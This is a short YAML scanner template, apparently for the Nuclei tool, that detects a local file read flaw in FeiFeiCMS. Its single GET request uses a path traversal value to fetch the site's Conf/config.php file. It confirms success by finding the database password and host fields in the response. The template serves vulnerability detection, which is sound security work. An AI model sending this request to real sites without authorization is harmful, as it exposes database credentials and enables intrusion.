id: feifeicms-lfr
info:
  name: FeiFeiCms Local File Read
  author: princechaddha
  severity: high
  tags: feifeicms,lfi
  reference:
    - https://www.cnblogs.com/jinqi520/p/10202615.html
    - https://gitee.com/daicuo/feifeicms

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "db_pwd"
          - "db_host"
        condition: and
        part: body
